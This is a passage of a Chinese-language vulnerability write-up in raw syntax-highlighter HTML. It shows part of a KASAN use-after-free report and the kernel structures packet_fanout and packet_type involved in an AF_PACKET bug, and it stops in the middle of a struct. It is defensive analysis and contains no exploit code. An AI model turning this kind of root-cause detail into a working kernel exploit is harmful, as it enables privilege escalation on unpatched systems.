class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">entry_SYSCALL_64_fastpath<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x92<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x94<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-54\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.842343<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-55\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.842765<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">The <\/span><span class=\"crayon-e\">buggy <\/span><span class=\"crayon-e\">address <\/span><span class=\"crayon-e\">belongs <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-t\">object<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">at <\/span><span class=\"crayon-i\">ffff880067d28000<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-56\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.842765<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">which <\/span><span class=\"crayon-e\">belongs <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">cache <\/span><span class=\"crayon-v\">kmalloc<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">4096<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">of <\/span><span class=\"crayon-i\">size<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4096<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-57\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.845897<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">The <\/span><span class=\"crayon-e\">buggy <\/span><span class=\"crayon-e\">address <\/span><span class=\"crayon-st\">is<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">located<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2160<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">bytes <\/span><span class=\"crayon-e\">inside <\/span><span class=\"crayon-i\">of<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-58\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.845897<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">4096<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-t\">byte<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">region<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">ffff880067d28000<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ffff880067d29000<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-59\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.851443<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">The <\/span><span class=\"crayon-e\">buggy <\/span><span class=\"crayon-e\">address <\/span><span class=\"crayon-e\">belongs <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-v\">page<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-60\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.852989<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">page<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-e\">ffffea00019f4a00 <\/span><span class=\"crayon-v\">count<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">mapcount<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">mapping<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">null<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">index<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0x0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">compound_mapcount<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-61\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.861329<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">flags<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x100000000008100<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">slab<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">head<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-62\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.862992<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">raw<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0100000000008100<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000180070007<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-63\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.866052<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">raw<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">dead000000000100 <\/span><span class=\"crayon-e\">dead000000000200 <\/span><span class=\"crayon-i\">ffff88006cc02f00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-64\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.870617<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">page <\/span><span class=\"crayon-e\">dumped <\/span><span class=\"crayon-v\">because<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">kasan<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">bad <\/span><span class=\"crayon-e\">access <\/span><span class=\"crayon-i\">detected<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-65\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.872456<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-66\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.872851<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Memory <\/span><span class=\"crayon-e\">state <\/span><span class=\"crayon-e\">around <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">buggy <\/span><span class=\"crayon-v\">address<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-67\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.874057<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ffff880067d28700<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-i\">fb<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-68\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.876931<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ffff880067d28780<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-i\">fb<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-69\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.878913<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">ffff880067d28800<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-i\">fb<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-70\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.880658<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">^<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-71\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.884772<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ffff880067d28880<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-i\">fb<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a7f994363130-72\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.890978<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ffff880067d28900<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-i\">fb<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a7f994363130-73\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.897763<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0127 seconds] -->  <\/p>\n<p>\u6211\u4eec\u77e5\u9053\u5df2\u7ecf\u88ab\u91ca\u653e\u7684\u662f\u4e00\u4e2akmalloc-4096\u5bf9\u8c61\uff1a<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a1c8f6415a8a308334128\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &#8220;`  struct packet_fanout {  \tpossible_net_t\t\tnet;  \tunsigned int\t\tnum_members;  \tu16\t\t\tid;  \tu8\t\t\ttype;  \tu8\t\t\tflags;  \tunion {  \t\tatomic_t\t\trr_cur;  \t\tstruct bpf_prog __rcu\t*bpf_prog;  \t};  \tstruct list_head\tlist;  \tstruct sock\t\t*arr[PACKET_FANOUT_MAX];  \tspinlock_t\t\tlock;  \trefcount_t\t\tsk_ref;  \tstruct packet_type\tprot_hook ____cacheline_aligned_in_smp;  };  &#8220;`<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a8a308334128-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a8a308334128-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a8a308334128-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a8a308334128-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a8a308334128-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a8a308334128-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a8a308334128-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a8a308334128-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a8a308334128-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a8a308334128-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a8a308334128-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a8a308334128-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a8a308334128-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a8a308334128-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a8a308334128-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a8a308334128-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a8a308334128-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a8a308334128-18\">18<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a8a308334128-1\"><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a8a308334128-2\"><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">packet_fanout<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a8a308334128-3\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">possible_net_t\t\t<\/span><span class=\"crayon-v\">net<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a8a308334128-4\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">unsigned<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-v\">num_members<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a8a308334128-5\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">u16\t\t\t<\/span><span class=\"crayon-v\">id<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a8a308334128-6\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">u8\t\t\t<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a8a308334128-7\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">u8\t\t\t<\/span><span class=\"crayon-v\">flags<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a8a308334128-8\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">union<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a8a308334128-9\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-e\">atomic_t\t\t<\/span><span class=\"crayon-v\">rr_cur<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a8a308334128-10\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">bpf_prog <\/span><span class=\"crayon-e\">__rcu\t*<\/span><span class=\"crayon-v\">bpf_prog<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a8a308334128-11\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a8a308334128-12\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">list_head\t<\/span><span class=\"crayon-v\">list<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a8a308334128-13\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sock\t\t*<\/span><span class=\"crayon-v\">arr<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">PACKET_FANOUT_MAX<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a8a308334128-14\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">spinlock_t\t\t<\/span><span class=\"crayon-v\">lock<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a8a308334128-15\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">refcount_t\t\t<\/span><span class=\"crayon-v\">sk_ref<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a8a308334128-16\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">packet_type\t<\/span><span class=\"crayon-e\">prot_hook <\/span><span class=\"crayon-v\">____cacheline_aligned_in_smp<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a8a308334128-17\"><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a8a308334128-18\"><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0012 seconds] -->  <\/p>\n<p>\u5f53\u901a\u8fc7af_packet.c\u4e2d\u7684register_prot_hook()\u7684dev_add_pack()\u8fdb\u884c\u6ce8\u518c\u65f6\uff0c\u5b83\u7684prot_hook\u6210\u5458\u5728packet handler\u4e2d\u88ab\u5f15\u7528\uff1a<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a1c8f6415a8d094280951\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &#8220;`  struct packet_type {  \t__be16\t\t\ttype;\t\/* This is really htons(ether_type). *\/  \tstruct net_device\t*dev;\t\/* NULL is wildcarded here\t     *\/  \tint\t\t\t(*func) (struct sk_buff *,  